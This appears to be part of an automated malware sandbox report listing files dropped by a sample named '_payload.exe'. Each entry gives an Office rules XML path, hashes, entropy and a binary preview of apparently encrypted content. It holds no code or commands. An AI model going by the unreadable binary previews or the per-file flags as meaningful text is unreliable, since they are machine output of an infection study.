                                                                                                                                                                      SHA-512:3F97505EAA28A70BF7766F49834656C93BC850CE94BFF6877697D7DE92D2E5A179F5CA802CA8742289DBD86988295BA794DD578B261A3BB5D9CC1F0B88DC4BBA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.N..H..5..<.Q...|Q..,......;....[,(.....M... ...\.d.;...H..~...=.......m6.$;....'.........<.Pz........%G.L...'..@..q.o\.a.SU.A..W.pO....$..j.+...$V..8..YI*...~.'\E...|.....`c....e2.\.Y...Sr.6.k..(..fP/.....@...~=X.H wn..U..k..N.qb...pd..N.5..$(..2..e{B..P..n..A..P..*}Gx..z........]b|....)U<....:..!..........G..wJ...BaU\go...f.d....A..Py.j]...S.f.P.g..6..........D....RG.....8h.i.6....yT.l%..';P.&a.V.Fy..j e...0.`.X..Z..H.=....=..F....Y!.1.J. Y*.B..b..o.]V...zx......._..m.>.A..F..E.....#..o.r^.._8Q.....e...~....*%.<P.|..C.........4%g.}2..0.R.)5B.x.g.z.[>....09/1w......;....7bVY{.Llk.=.t......p>5.'...-..0N..k+.PxQ...1w6.S....V...p.'.)1.[p).....5.Y.$..=A0T.%.N.Y.N.]..f..\...UwE?.Q.h........Y.p@-\2.G..`....(.)..%.=1.}.BQ...C. AtZ.:.4x.z1..&.e.z_.N.......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11932v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3566
                                                                                                                                                                      Entropy (8bit):7.952246334812899
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:XamsriA0UYAKk5ZQlAAtcXs5ykHgYajVa5o4:ql9bYAKk5ilpfMkADkf
                                                                                                                                                                      MD5:8B57AF5DCB1D5D359944999013866A97
                                                                                                                                                                      SHA1:BC116F094D04B61808A804AA179F0AD8A3B5C902
                                                                                                                                                                      SHA-256:B47C8861ACB694A066B986880AB9B61028EE471FE72F8A6220DC75B57A318408
                                                                                                                                                                      SHA-512:B8D819AECB8FF4E0FAF4B0A89BDDAC0BBF82EF77C8B5D601E20D47F692E7D5A4A7CC12EBB1792A4DCA6FC55DF565652E810C29B3E919422E5F825BBE99F63B67
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlt..).._Q.7..[?.*$R...T..il"u)z...[..Xf..vU....H....[].X.......F.).0.z.pS.g.P..[..2.DW....f(.K..._..m.co,..61...V..lV.+0@5.rh.....;o..WH./P..;............o..a..V..K..V..l0..dF..@ESnBrp_...L......{T...3...v.k`>d.O_.(.TK.?.>.|....!..q..:Z+G5x...}........M..c.W.r=,G (i...~.F. e.v.}c..YL..O.n1..n.OF....8.)...=i\I..2...S..A..}...8.f4q......^.4f.....L...b...}..g.0.8...P-...9.r..o....E.....5.b... ...Q.....Do7......./W..4B.?....&...?K.P..S......F...u.a..r...9.....$<F..,.e,......t...M..{.h...u{KL...%n.=.2..*...D$.+n.xWc7.)..7$..b....'..<+...u..P.. ........X5.E0@<..8c.3......I.k.D....m.6.j...F.`.U}..Sw.^.]e..n...A.v,j....2...0....n..$......).M..h..{.`...do..+..9..:......^...o.R.~.EO...|%g(....*). ..{.~P..;.S....7.3Y.#..........".g/a#....>J7.oYm...z,..6@.M.R.$...od.......u...Z..}y....[lt;Y...R.mh.{..V[Y.;..hu./C...#.....+=.....)"..2.._...../e.b....6..f WY..r<.[./..I{W..jp.....xE.Jp.W......6..3X.r.. .v.p....h..?....O@.M....H]...m...j....}.* .m

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11981v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):821
                                                                                                                                                                      Entropy (8bit):7.77550303054373
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:qiIQQSI3GPHHUrguQpT4cbtI9Hlu/AQjr8eBwl00XKsIvXKFM6uSUdNcii9a:3IkwGADc7AZeBaaQM6d2bD
                                                                                                                                                                      MD5:C635A337DB9FDE8777533950D26584BE
                                                                                                                                                                      SHA1:2968A0EEEDE4C3DDD9D2F94D2E2BCFD299E8BEC6
                                                                                                                                                                      SHA-256:E3C56C1CCE8336E1932712152CD94CEBFF1D8BE5A7D4F6B9BF6980C3B14A420A
                                                                                                                                                                      SHA-512:15EEF4D58008509E1DB4C7C8AA8D5EF579B9F91969EE5FB183767DA4E9016888FB2FA1E7BC7043AE92F5715C36CBE39C967648D6A52A9732B7E5B74C3CDCAACF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml*..":.?.`..../..lW.....B......C.....S....AFaf.>`-...0.........VX.xi..f.........d...I.W.YR^u.K....\..M.71..........W....@...Z!`.*....Il...(v..E.....Q}.D..)Ex....J.n.)w..........+.0.T...<.N..Ii..h....{....#.T:..x.dwD..y....Il..}L......6.}}..!...>&.....j<.....OP......Bf.!.~.......k......oSMqk......%^p$88......hG._......$..}..H...-<uKs.@D....DL..G...q...}......a.aN.gf.3B?.."..C.Y]W.."..M...x.G'...6..G.......+w..6...v..&Bo\.SJ.@..@..Qr....$..;d!RU...bb..TQx.V..J.z..s..60@..^yL.C.&.M..............,.5...y... .....JH......i.%......h.....\1.....]./UIX..o....Y F...zy..3r........>....>og..3..O...6...x..r.......9Lg$zw..pU..}...EC.....Q.^.J....<..]....O...'V.....*%)..G...6*.,&.&,}.......=.d.!b.._....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11989v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1034
                                                                                                                                                                      Entropy (8bit):7.777402299377401
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:LS3+7Y6TobpswKDqtmJhL6zX2x46bnBPup2csb92bD:Li+06asNqtmJhLEXFcJu8hWD
                                                                                                                                                                      MD5:A54AABB9D320D08F4C663AFE21C83BC0
                                                                                                                                                                      SHA1:90C6BB67E7915F48B933B67C8F9DD39AFD549F3B
                                                                                                                                                                      SHA-256:4A33BFE01D826793E9F8345BFF914CDDFF82C9A6765F864AF3024EF6584B789B
                                                                                                                                                                      SHA-512:B1DAE22C7C5F9A119BB7886338CA2C971D947CE9036EDC276A94070CB9B828057A63193D27337CB08A62DC914606573D2BAAD95BB683D571E1D56B9B6E92A551
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml........@...lcD..q...cJ+G.... ...[.z..\........Z.r..5..^...su%?....b.~M.-.X....9G..r...........m.=o=3......w...D.,..H.h.bp&.?>K.[..~.$.. X.\2.ph.=O..i....7XY=.7..8.;.c.:Fw-..MTp....*(..k..v.dR.BSXtNv....d...G"e....=...s....a[b.`.Y...jR^.T..4.Z.&...g..............o.....:(..../..$u..YWL....:..CT8...AF0.G._..P.f.x..KzP<..5.#1.Le.o....gu*.H...@....%Y.~H.,.#j....m...t-...u..F<)...0..o.*%r...~&.*.....g...[.......s..J.5.........3R...w..0".....s.g...R.p_T.F....<G....Wz.L^...HN.U.rco..:..=S,`.&......'.....^..o..3P..?.....2..4..B..IX*.H.(....O*0...u.........H.]..}}.Q.(....C.V..$M...R..I.Xu.B.....0?..<..y=..Cv......F.....t/.-.&M@gbb...N....c9...V'.>Y..U.n..g...W...C..F..0.QL..cN.C....A<G@.......b4.....0.."....)..../u!...(.<..<$.kf..r.PA.vN..5...t.7.{.........:..|.......j....^....<...........~.vN.*~4.=.....\.g,.).v...9$.N.j4.2.#0..Y.Bn.3".Nz...N.....89.VR('....>.<^....5....R.$7p...C..,..MmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120100v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1333
                                                                                                                                                                      Entropy (8bit):7.8743230856928745
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:dPvogLwpqCHqIqAx96LSv19YmLUQdb1y7+KuTPF0ayS7utU4yHviQ2WTV2bD:dPXiqCHVqAx9a+9JLTdhyCKubF0aN7u/
                                                                                                                                                                      MD5:6CAB4F87D03F3CB65828B06FC48185C6
                                                                                                                                                                      SHA1:41BE59B60A2E7070F25B184DE7AA052F9F801788
                                                                                                                                                                      SHA-256:81DEF9B9ACD27598EE0958541F7F4C9B8743CCDAB12D8D0CFFFAE71851A32CA1
                                                                                                                                                                      SHA-512:DE528E46A4BEC613382604D27928F592D33E4E7422595891906507CDB5663A81452F6CED6E7DC2F382B13851D5800A7164E88E68FA298D6C0B5D00C487E3736B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlb..D.i..H......XL.(...t...c..=?D.<5..\..}.....}..7@R.<.....;P....`.3E...:..}H@.-.....2..,Ur.((.........L..SC..*...{m....;.0bhc..g...F]U.X...[..F6.73..tu'.Q..[..BtA..{`....I..C.]?...H..b.}..]C.yl.......AI.Y..h.+M...z.AU.O.).mUAv.. ).........^.$gP.z.4....J...x.....{)..6L.-*h..fh..^RiG5..P..WW.m....xG..%C...TH;.$E.*...I5..q...zg/*!Y..np.fLl`..bx9..<..(..,......Q..^....Q.g.....h|.a....7......^.<.'^WA.n.'....1.4QO.s.e^.8.lo[L..a.i.....=+......).S/.W(Z...2XT....l3....k5.UG8...&.w....m,../E..d.. #..../.....E.t....K..O.d..Mb..k.d..{D..z....CsW.+..x.T.3......lI....#.S..P...(.......R,.e}...N...4.%>.q..Z]\U".,od-.>{'$I......7....c!...Uc08.S...3...!..>;.o._....w,.Y`d.8.g.V..$.....P3.?..D .c.JF8.O..(e..G.......F.(.....n?:.t...a.r.%M(....4~....g..`...'.j\..A.....B........K..Iin.X....t...#i3..D....0P.....V.........=....[|>....B...D.h..=........H.j8...!6..N\..."r%.g...6.f)..U..........R......S....t.........ZFI.. i...<..q_....m.lu..k..9%r-.H.....J.A

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120119v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1665
                                                                                                                                                                      Entropy (8bit):7.883264128293287
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Pxyh8YOLZoGJLqdZ61NfbIHPMFMKj8jGuNgvFi7tOgvWys4iA3TD:Pxy4WGBqb6ovMzDkYl4im
                                                                                                                                                                      MD5:3B8363FB1C91DA42D5CF129FB8A88D3E
                                                                                                                                                                      SHA1:F09F65DE06977138BAD7FB0370BF7719FDC7D2A7
                                                                                                                                                                      SHA-256:89DA2CC1DFF837DBCF8300E5863EB88EB1AF075478A990783F327A2ABE3CED58
                                                                                                                                                                      SHA-512:771FF1EAFFA020114BDE6D2B235AE113A626ACF2A1A6078D77282A16C63B3FB59AAE5E00AD2E4613A2BB40EC21AD6FAA8A4568B4896077B86F20522C30E5C2C5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.f>..#.um....jK."...('.!.(6..Z.. a..[.!..'.m...{...%...w.m..6rM`..._^5%c^`.Bm.A.....h..'.D#.../...v..E.....w..*rF.r.eJ.....p^.....F<......^.Y....}'qv....iA..m._...|.I..70...4.k.w.5...[...d...]b.9....6f.z...P..5..i.Sq|..M.....jv.EL...[....P.$..y'..h...;..V.......Z.bf..f&......B....,7<...>....B........CUR.ZfX23[p(...g.U......).e\i...X.p.@.`..p.".8..v..:..-...)7...........:..5zv..3..S.a...~.eb...ET<.. .m.h.W.c....l.7.....JQM..;........~.....,.Y......5h...H.WT1..S./c.CEk........v..O.'S8y<T^..f...I..SV.......H...."..D}...5!1A.O.> ..=.).]D.M.....D.....S9..E...H.s...-..u&..r...#H..8+.Y{.v.5quR.w...F.[.%..0T.......n...A..*.s.ZV.o..1J.<....X0.d....c.H.....&2......<.:M.U...U...?].0g;) ....Y5..mE.B..V...U.6.@.S...'...{.....d8..JB.o..=V./.0...9.i.z..L.8..PQ..!...5V.........."&........ym....O<m..."O.&.O.$.".@".q........b.....H./.z\..}/.d.D......!r..E..k...}._...p...C.U...n.S...X....C.<....k......k.C;..f.#....1.k.C....Y...ICK.F.k. a=W..3.3.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120128v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):992
                                                                                                                                                                      Entropy (8bit):7.751168587960003
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:PiWUlkQgowQ06yDtgt0j2ShHRPeLSY28SHNLxNswCBnlxlm2bD:qWbQgo/yGtQDeLZ28ShswCBnlftD
                                                                                                                                                                      MD5:2EBF28AE37C1B58C29427D0CDA491092
                                                                                                                                                                      SHA1:EAAA90E77FA96CB371670F682AD2C81DBBCE47EF
                                                                                                                                                                      SHA-256:3BBC5BCC76CE7B0260BC342BE37B3F69C6EC41F3E029458E1BC3230B0524A173
                                                                                                                                                                      SHA-512:B9C89F736084F526246259B102168B3256567ABFDD6572625D6D51214C3685DAA89256DAACFCCF73241CB35940B932CB16A9B28787E066F1CAB9D358535FBA99
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?...O...@.......\.-.Y....}.S..@~..p....t.#4ir..!..nu.7...4.A]....{...=..u.-}...+..o...,..#j..f`...u(4...T...!.m.\.......*..{..t..p..=.p.&..g..~...I 3H.E.w[p.......v......9f.ef.5.^ji..N..\....`n..w.rT....h..o.~.i....<....+.....U|.+.7.0.....v......WrVLQ?.KW.8.K....I....H......O.2.b6.=..P.&......1V2.e.K.&.......d.......4.H.....p(5XJ...#P..#...i..v.....!....4h.-O4..|.d......9..g......<p.TyTj0C'.....[x..j........l..08.Z#.X0..j.....?....f$1....@.on.....-i...-.]Z.r......u.i"Z'.A..n.=.]..o..W..?.e7.I...4...X3.....u./..\.>..F2....~N4epD.n]~.v....3....Y...&2z<u....C..i.l1..J1.D...c.1..}..0.....q@F..A..`..'.l(.......n...F./G....U.Mka..`_am.tP.!Z{...$.e.V...-..3j......o.+.........l`PE8k.;.......%.*.,m..?...}*..b..i._.....I ..E..O..{.s.Z3..1.uN......-..l.<.w3.....+.*... ..H9.[.W.v.1n`.f.@...^..'5..l..R..N..B.-..:P.0.Za9......G+.2..%...._~wO....GC.%.%..=p...m...C~.v...i.l.y<.M+mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule12019v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4150
                                                                                                                                                                      Entropy (8bit):7.95533033522161
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:3/oaqey04KwHG1BmOaawlb8C1xJoa5W8byblLisu2aT:voaqvRawl1xJx5dby5Wb9T
                                                                                                                                                                      MD5:F8276A9B0D0DF1218CE79F28E6764519
                                                                                                                                                                      SHA1:D6F82CD9C5C332C1D3D7CA697CC47B8FF239654F
                                                                                                                                                                      SHA-256:38343D5B0364DC84D9E824F1BC6E632381D76C639A6D623A141C0BE8342DD61E
                                                                                                                                                                      SHA-512:086A32847AA5C14B3055FB88C4CDDFFE9458B70B60980500B0AECC8E6FDB62D242515267F8E3EDBC99630FF52C1104CF033B2553F1411D6AFF87DAC9769FFBAE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlin......%..`..j..`........2...n`....b%<..g.M...7......e4...\$...`.....{....k+..t...F6...N.._.(::f..7)~2/;..T..f"Or.H.......;...W......Ha.8..K............S..@d.q8...d.v|....Mw.\......GY....GW....{k......8.>..0...l..j..jo..JP.1..q$.'.:..h.K..L-..d.v..j.@Z......+...L....y$.;.r.....h.....y.../.KO.....&........n.O...v.).......L........}.?K.'...5...........,.....F..m.....MD/ 3..$.0.HC.j!...Z..k..r..}4?.T.*B..i3!.M.0"....s|G...V(.....I..rK...J>......&A....Q...|....cg.....C.U.!y..........F......<....\l.E].......cf:....[.:>.{.......F.&.%...[K..my.......~r<.U+.F....s..Yu..;m...`...".)..][.;.s......x...6..<..X.F.8=.."+....uT8...e.1....w..(......[k...~P....'@ .j..'.2...9*...&T..n\.B.(.{..wW..0- oP.J*..EGoM.y.m.w'...jw.v....n..e.....X.F_..B...T......H"..9.......?..H..y..@.-t..D..1.&.T./.A..q.....a..8k..A-..I.Z...u.6..T...~,."eIa.GQ.. C.....V.i.JL3..!}ML1...j}tMy..O..#.YQ.~%.Y)1.I...[..4.}..e..v.u.._.().....X..}...h.o......8G..TQ<e.G...nP

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule12035v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2801
                                                                                                                                                                      Entropy (8bit):7.928109857586717
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Ni6SSvCy+KmCYDJeifkQkSY8XAbxAgNs2s6I7YTctiaoMuZ/AHw4r0u8dZJD:Ni6naq4e8i8X/CDst2McV4r0Trh
                                                                                                                                                                      MD5:D7BFF1E90E1781B41DCD2E2C373406B5
                                                                                                                                                                      SHA1:4AD2E15971D666163FD41EAB5FF5AF511CC9CEDE
                                                                                                                                                                      SHA-256:0C5F52C92B43B21C793185CDBA186761229BCD7177B7FBDCC98028565F065FBB
                                                                                                                                                                      SHA-512:C33663BFE64C38A30D6326D7ECF77F6261B15086161CAD322744206214308C6A1BD80FFC235F373E3B22DACD57B13515B42BE391336343538CC7EC7EC06BF72B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.x.,...!.w.,..?.=y.u!.ys.|hb..=.!eS.6&W...t.J..J.DE&..%...a..A.{.M.....<s....uqM..}.S..{........2.YiL........;..N.....-?@...z....O._.^..9v......NqH..,.1M....Z...jh.jW...2..l^.!..3}!.'YK..b./...>.....w.~.......^..l..]d.....Q:b.G.....#....6!."{.,......SZ....Q..J..UL,.;p.I.j.2...C4../....}5...U.....y........YLP1S.'p....X..N.e....5G.......]v.g....e.\...8....$N.W.\\,'...Dbb.>.5.S.....r..P\....r..z%c..u.%P26..*|.T....*.1)....T.~uf.yh.y..V;..!..z..Y..w....p..q+...%.Px.s...8....U.....C...$..2..h.[.r..m.rU....V@J3Mf..9.M{|X.......f..8#..:.a.1#.<..$.sSF2.Pz3E..bew&.|/Y"..h..M..1@..U.V.....=1+....a...,.-t$m:..L./.,u.`..{F...O......`e._....=./c.W.1.u...}.D..8fL....~..9........v..qN...ZL.^..Z'........D.......d...._.t)...5....x?..@iE..:.j...M...oU..........5....^....l.4..q.cSgYT..fU...r...vV.....@...>..p...~...Aj..X...~A.5.1...uk....6g..."..............M..o.F,%72...U..".bn.0....Z..2...6.;.....p..@...............u...g.I.\..g.O..(.H....*[..)1.>.O...Z

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120402v21.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4122
                                                                                                                                                                      Entropy (8bit):7.952882778670526
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:H99u8+nPSjLyNJJaqcSpkoAfoiireT817bBMCOBB:H3u5auJho7Meu1U
                                                                                                                                                                      MD5:1A64B08D0FE5806549F084ABCE14F2A6
                                                                                                                                                                      SHA1:F67E31ADDB5450DF1D451B36694FD115D187B54C
                                                                                                                                                                      SHA-256:72670B06957ED1A7C33C9A374FFF984E8EEB46229F12DDDC1EB53A6AB7CC203C
                                                                                                                                                                      SHA-512:93488893DEF1689D93DF7AAF46075B154C973CE9F7FCE0BBC14D1C3E945F2451763E61ED6B11F0F7A7EED47B02B785F345AA632B1CBC634BED344C78F50773F7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..ua.6...........(...6D....k....&e3.....$$V.......T.'...iw.$+...;......,T...I.G.S...{.0..%vI.7.y..+8~...r.Bx....y..U..I.3.+...lc......o.....v...v...\.e}N..W......p|....t,m..<.X..8.....j.a...`..i.3$..:b.m.i..}....2K%.....2...T.-.S.4......y.8.g).L{._W]...._RZGO..-..9_?..v.6&2.I.=.L...6_.t.5]..#."(..s....O........_.......*>...+.......RA.g....!.3...N...n.._/O.E.s..qQ.W}.r..........o..(.Hm<`47.n..>...mE......|,...../..._...8......R...Q.T{..wP.A..f.4..7...U']@R_c..`v8sw.oa.*....}.1J.....z.T..e.B....... }....#.Lj%.;....|.a.J.J...s.K_%(.OlOi\.h.A..\/....,.]......P........8...r..b.d.[..n.-.R....6:..Q<..e....*..Q....Tmw})5..."..`n..=.`.PTS].ew(......:}..W.....8b..%...M....Y.L.P;.#H....V=..;.x.}..g.jQ.lA...*.B.c\3._.v;ug...b`{.?.....Gu.....3.po-_....3E.r.X.x....?..P>..;.{.......t.;n..............337.+.U).."..!...j....f..).....E..L..|..U.u. ..}..n.\.....:.<C.<....x.h.;....-.w...#..'...9..*...h...[.)..hp.3...~o.$e.,.u.e.x(..Q.>..[..CI./....8Y.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703000v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1703
                                                                                                                                                                      Entropy (8bit):7.881440112849128
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:TYssbZyfPhmhei0F3Ckm2DZGWfYA2+84fD:T1aAPEVpkm2pD84L
                                                                                                                                                                      MD5:2D3EEC19B3D75C077D56B1E85A4A534C
                                                                                                                                                                      SHA1:593813FCB0D08262761AD161126F88D7BD897ACE
                                                                                                                                                                      SHA-256:DA069BB7CD3F4A8D99FD1D3F4166173A384D8F3DB35A0A173978DB6A5309AF9C
                                                                                                                                                                      SHA-512:7DA68A318D0A22475C5BCCF4E498B86DCA8266143823C6A3F54ECA2D253DE0CDFDE90B352FA3F4421B842CB12DF5124AB0FDD41524308BBEE2219F0C5FF31949
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?>...F..p..*.........3....... ~...iZ.X.)g.N.m.I.`....p...h.{.1.<....U........._.0.g7..Y..H..<.U..............._w....=R...#.k......FR.c.P.c..G..W.U.e.!VP..s(..HY:(.Tf........#..%.......m.l..7..`...~.....9.G..;...=..L.|.%..Kl...O"T...;..jh...F.Q.M....p..N7..b.""=...|.....qC8..CQ.../..g.^.+......j.Uu......'....u.........DX.vy..!.V}f.VpN...u7.t.s....I......&.....K.o......"....@...Nex.L-..0...0.._:5.?0..{.nZ..P^.e.Rvs.0....xA..D%.;...g.c.5M_...n........e.....f....s;....B...^.X.b..`. ...A..D1a...1y..0yk....7...).92`V%ih.Mj.]\v@U.~moo\.='y|...R......d.<.Ar...ej.....3..=..4.....Y).s..'....3.....Z..../.Kv=I...F.@#.(.m1S.}&L...<u.|n..|.8.....z.1..N.T.D.* ..1Y2... ...wn.}.+...kh.zf.>.&.?^v.:..!B.7..Fs.!Ft.....v...?.;.....u...N(-........U..........+G..........;F..4..&?..Ha.M.g..;u.hy...z@.Yx?.,"..z......?^......)%..v9..0LpQ+..k...S.0..M..jO..n.!.}.......*.'...@......u.M....ww.~lo.......t....K.E.M.......+.T(.d.;..M..VK....rta...oh...Z..,.Kf3j..-.Nz..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703001v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1740
                                                                                                                                                                      Entropy (8bit):7.882327731859586
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:/po+rI1xNd4DBpPX0FNlLMn2v6lm9AP4475EalD:bIXN+DBpPXGC2ClIW5Td
                                                                                                                                                                      MD5:B556FA6F0B885A978CB8FA51F1FC7440
                                                                                                                                                                      SHA1:0D39F173AF5586BF6A50128856A1D3DCB1D41872
                                                                                                                                                                      SHA-256:A262556253B00A9A7483174A05EDA81754DC67BC6A734122962E8E5A2B3A39E2
                                                                                                                                                                      SHA-512:A3C27DA7EF737962E5856E18FA1C86D1C2FE2EF08FA07F0620AD35BB9C825FA93A92BDC136CD9E21E195D11DD7EBFD52EB96FAD03CACDA8DBE9F9AA261D3D66E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.G.r.....r\/..y.~%.X..!...T..A.Z1....=%?8...gL2[,c"I...:.u...;@Hc.....<.~..)%.9?P..H....R........Swu...`.*......I..SD..}@............W.C..M.........@V.J.M....T7^j_..!.d.,.@Tc.+<J.+..rJ......{..oL2.......4...?5..b.Z..y.it..-#.....<.!...!..A.H[....X?XZ...&....O?.......'.q.i..s.`sQX.\@.7.[3\....P......{.Ge.}.,q%..n#T..&.e~..s...D. .!.....o...R...y#....\j1..Bd.$............x...w...el!.?x1(..%}...{.O...G....Y............V..z.8..>8QYI1.X....~.Z`....2...6.Z...dNk...U*.S.@[...m6.....Y"4Z.V......s..bQ...Q7M..9.kio...e..L2.....Y......|..t...S.E....9.....#..'.[..T. ..FN{.|j....A....>..q&.;...V.W..u...=7...a..u.X.1..9......:...G.....@.$h.....Sf...FS.......vZ..V.V-kZ.\.`...6x!...-........'..$...k..NF..j...5.......&..L...J..n.k.LE.ap...$......U6.,....9HkG......4.....Bf..XH{...7...7....t4...8q......1Z.....h.%.>.....!.zfq.LN........emx!VJ...s[{..S......?..`.....iF.}.].%BP...S1.Yb...8..ww..C.........g.6G7...1.WG..M.........*...-`..5P.[e."..|..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703050v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1725
                                                                                                                                                                      Entropy (8bit):7.885607477831958
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:vvIqIRKCkeyADW6CQ8e0Q7tYH09PYoSkD:fI7kTADN4xQRW0aA
                                                                                                                                                                      MD5:9135E95F5AD82A8DFD17EEBC8512CE71
                                                                                                                                                                      SHA1:748DC336D86432DCC86B1D57553D5B43224F20C9
                                                                                                                                                                      SHA-256:B6DBBDF2A8DB6E14C587DE13CC29136FD883663141D6AE88B0C8A949123186C5
                                                                                                                                                                      SHA-512:D17EA84E5BCDDC11F35F67AE28BCA9EA3EC502877A0C7C7B6A3905AF18868AFDD1A3585D46BFB64B1EE01D942A5424C0A7249EC35D73AF8A72C5F0CBE157EFEF
                                                                                                                                                                      Malicious:false
